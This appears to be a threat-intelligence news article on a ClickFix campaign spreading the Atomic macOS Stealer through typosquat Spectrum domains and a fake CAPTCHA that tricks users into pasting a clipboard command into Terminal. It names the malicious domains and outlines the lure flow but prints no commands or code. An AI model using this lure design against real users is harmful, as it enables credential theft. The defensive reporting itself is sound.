Atomic macOS Stealer Malware

Cybersecurity researchers have uncovered a new malware campaign that leverages the deceptive social engineering tactic known as ClickFix to distribute Atomic macOS Stealer (AMOS), an information-stealing malware designed to compromise Apple macOS systems.

Typosquat Tactics: Impersonating Spectrum

The attackers behind this campaign employ typosquat domains mimicking the U.S.-based telecom provider Spectrum, using fraudulent websites like panel-spectrum.net and spectrum-ticket.net to lure unsuspecting users. These look-alike domains are crafted to appear legitimate, increasing the likelihood of user trust and interaction.

Malicious Shell Script: The Hidden Payload

Any macOS users who visit these spoofed sites are served a malicious shell script. This script prompts victims to enter their system password and proceeds to steal credentials, bypass macOS security controls, and install a variant of the AMOS malware for further exploitation. Native macOS commands are used to maximize the script's effectiveness while maintaining a low profile.

Traces of Origin: Russian-Language Code Comments

Evidence suggests that Russian-speaking cybercriminals may be behind this campaign. Researchers found Russian-language comments embedded in the malware's source code, pointing toward the likely geographical and linguistic origin of the threat actors.

Deceptive CAPTCHA: The ClickFix Lure

The attack begins with a fake hCaptcha verification message that claims to be checking the user's connection security. After clicking the 'I am human' checkbox, users are met with a fake error message: 'CAPTCHA verification failed.' They are then prompted to proceed with an "Alternative Verification."

This action copies a malicious command to the clipboard and displays instructions based on the user's operating system. On macOS, victims are guided to paste and run the command in the Terminal app, initiating the download of AMOS.

Sloppy Execution: Clues in the Code

Despite the campaign's dangerous intent, researchers noted inconsistencies in the attack infrastructure. Poor logic and programming errors were observed in the delivery pages, such as:

• PowerShell commands being copied for Linux users.
• Windows-specific instructions shown to both Windows and Mac users.
• Front-end mismatches between displayed OS and instructions.
• These mistakes indicate a hastily built or poorly maintained attack infrastructure.

The Rise of ClickFix: An Expanding Threat Vector

This development is part of a growing trend in the use of the ClickFix tactic across multiple malware campaigns over the past year. Threat actors consistently use similar techniques, tools, and procedures (TTPs) for initial access, most commonly:

• Spear phishing
• Drive-by downloads
• Malicious links shared via trusted platforms like GitHub

Fake Fixes, Real Damage: Social Engineering at Its Worst

Victims are tricked into believing they are resolving a benign technical issue. In reality, they are executing harmful commands that install malware. This form of social engineering is highly effective at bypassing user awareness and standard security mechanisms.

Growing Impact: Global Spread and Diverse Payloads

ClickFix campaigns have been detected across customer environments in the United States, Europe, the Middle East, and Africa (EMEA). These attacks are increasingly diversified, delivering not just stealers like AMOS but also trojans and ransomware. While the payloads may vary, the core methodology remains consistent: manipulating user behavior to compromise security.

Conclusion: Vigilance Required

This campaign underscores the importance of ongoing vigilance, user education, and robust security controls. As social engineering tactics like ClickFix evolve, organizations and individuals alike must stay informed and prepared to recognize and block such deceptive threats.